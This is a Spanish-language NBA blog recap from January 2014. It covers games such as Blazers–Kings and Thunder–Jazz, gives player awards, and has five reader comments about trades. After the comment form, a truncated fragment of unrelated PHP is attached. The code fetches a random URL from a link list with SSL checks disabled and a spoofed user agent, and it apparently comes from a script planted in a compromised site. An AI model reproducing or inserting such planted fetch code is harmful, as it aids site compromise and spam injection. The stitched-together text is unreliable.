La Crónica: Rebelión en el Oeste

08 de January de 2014 por txusma

Se aprieta la liga. En estos momentos tenemos 5 equipos separados por menos de 2 victorias en lo alto de la clasificación. Blazers y Thunder cayeron mientras que Pacers, Heat y Spurs sacaron adelante sus encuentros con más o menos dificultades.

El de los Blazers puede ser uno de los partidos más locos que se recuerdan. A falta de 8 minutos para acabar el partidos, los Kings ganaban de 19 puntos gracias a un parcial de 32-12 conseguido entre el final del tercer cuarto y el inicio del último. Pero con Damian Lillard en el campo no puedes dar nada por seguro. De su mano, los Blazers consiguieron remontar y colocarse a 2 puntos a falta de 16 segundos. Lillard había anotado en el último período 26 puntos de sus 41 puntos totales. Por desgracia para él, a Isaiah Thomas no le tembló la mano y cerró el partido desde el tiro libre (119-123). Los Thunder también cayeron aunque de manera menos épica contra los Jazz. Durant anotó 48 puntos (lanzando 34 veces, eso sí) pero la estrella del partido fue Gordon Hayward que anotó los 17 últimos puntos del equipo y acabó con una hoja estadística para enmarcar (101-112).

Tras una mala primera parte, los Heat se pusieron las pilas y acabaron ganando fácil a unos Pelicans a los que la baja de Ryan Anderson les va a pasar factura (88-107). Los Pacers también ganaron aunque en un partido mucho más feo. Su ataque dejó mucho que desear pero su defensa dejó a los Raptors en menos de 80 puntos (79-86). Más entretenido estuvo el Spurs-Grizzlies. Los tejanos llegaron al tramo final del tiempo regular con una cómoda ventaja pero se dejaron empatar a falta de 13 segundos por culpa de una pérdida de Bellinelli y un triple de James Johnson. Ginobili puso por delante de nuevo a los Spurs cuando quedaban 4 segundos pero Mike Conley forzó la prórroga con una bandeja sobre la bocina. En la misma, fue de nuevo Manu Ginobili el que decidió con una bandeja a falta de 2 segundos para el final (110-108). ¡Que bueno que viniste, narigudo! 

Los Warriors se sitúan justo detrás de este grupo gracias a sus 10 triunfos consecutivos, el último anoche frente los Bucks (101-80). Victoria muy fácil a pesar del flojo partido de Stephen Curry, que también tiene derecho a descansar de vez en cuando. En la bahía deben estar poniendo velitas a los santos para que no se lesione nunca más Andre Iguodala. Por su parte, Phoenix y Dallas cierran de momento las plazas de playoffs del Oeste con 3 victorias de ventaja sobre los Nuggets. Los primeros cayeron en Chicago a pesar de que los locales solo contaban con 9 jugadores disponibles (87-92), mientras que los segundos se impusieron a los Lakers gracias a los 17 robos que consiguieron y a Dirk Nowitzki (97-110).

En el Este, Washington rompe su racha de 3 derrotas consecutivas gracias a su victoria a domicilio ante los Bobcats (97-83), Cleveland empata con los Sixers en la clasificación tras derrotarles con CJ Miles anotando 10 triples de 14 intentos y a la espera de Luol Deng (93-111) y New York gana a Detroit de la mano de Carmelo y se coloca a solo 2 victorias de playoffs (85-89). En el último partido de la noche, los Nuggets apalizaron a los Celtics (98-129) gracias a los buenos partidos de Lawson y Faried y los 7 triples de Foye.

PREMIOS

MVP: Un no habitual en esta categoría. Gordon Hayward fue la némesis válida de Durant. 37 puntos en una serie de 13 de 16 en tiros, 11 rebotes, 7 asistencias, 2 robos y 1 tapón. Lo dicho, para enmarcar.

Rookie:  Éste sí es habitual en la suya. Michael Carter-Williams se dejó la piel para intentar darle la victoria a su equipo. 33 puntos, 6 rebotes, 5 asistencias. El resto de sus compañeros titulares no remaban en la misma dirección.

Sorpresa: No sabemos con qué quedarnos. Si con los 10 triplazos para batir el récord de la franquicia de C.J. Miles o con los 11 rebotes de Andrea Bargnani ante los mastodontes interiores de los Pistons.

Decepción: Después de una extraordinaria racha de grandes actuaciones Thaddeus Young se quedó anoche en 0 puntos, incapaz de anotar ninguno de sus 7 tiros. En el resto de facetas tampoco brilló demasiado.

Esfuerzo en vano: A gustos. No le sirvieron los 48 puntos, 7 rebotes, 5 asistencias a Kevin Durant para lograr la victoria ante Utah, como tampoco los 41-7-4 que firmó Damian Lillard frente a los Kings.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    por un lado Portlnad si no quiere perder el tren, ya deberia moverse en el mercado, tienen espacio y muchas necesidades en la banca poara curbir,

    un afflalo seria mucho pedir para salir de escolta suplente no?

      Citar

  2. Denise dice:
    #2

    Esteban:
    por un lado Portlnad si no quiere perder el tren, ya deberia moverse en el mercado, tienen espacio y muchas necesidades en la banca poara curbir,

    un afflalo seria mucho pedir para salir de escolta suplente no?

    Para escolta suplente ya tienen a McCollum, demosle una oportunidad al chaval a ver que tal lo hace. Lo que si podrían hacer es sumarse a la puja por Bynum ó completar su plantilla con algun jugador alto que aunque sea paquete, batallee, de leña y gaste faltas. Un Maxiell de la vida o algo así.

      Citar

  3. Esteban dice:
    #3

    disculpa, pero MCW, no se dejo la piel para la victoria de su equipo, se dejo la piel para maquillar sus números, el partido estaba definido cuando williams tenia 14 o 15 puntos, y marco la mayoría cuando la diferencia oscilaba entre los 20 y 30 puntos

    MVP, para el Big 3 de SACRAMENTO, Cousins, Gay y Thomas increíbles, sera una base de un equipo ganador?

      Citar

  4. Esteban dice:
    #4

    Denise: Para escolta suplente ya tienen a McCollum, demosle una oportunidad al chaval a ver que tal lo hace. Lo que si podrían hacer es sumarse a la puja por Bynum ó completar su plantilla con algun jugador alto que aunque sea paquete, batallee, de leña y gaste faltas. Un Maxiell de la vida o algo así.

    bynum luego de ser cortado, ficharlo por el minimo seria una buena oportunidad para los Blazers

      Citar

  5. Lucho dice:
    #5

    Parece que los GSW escucharon a esteban y su pedido de base suplente
    Están interesados en Kirk Hinrich

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>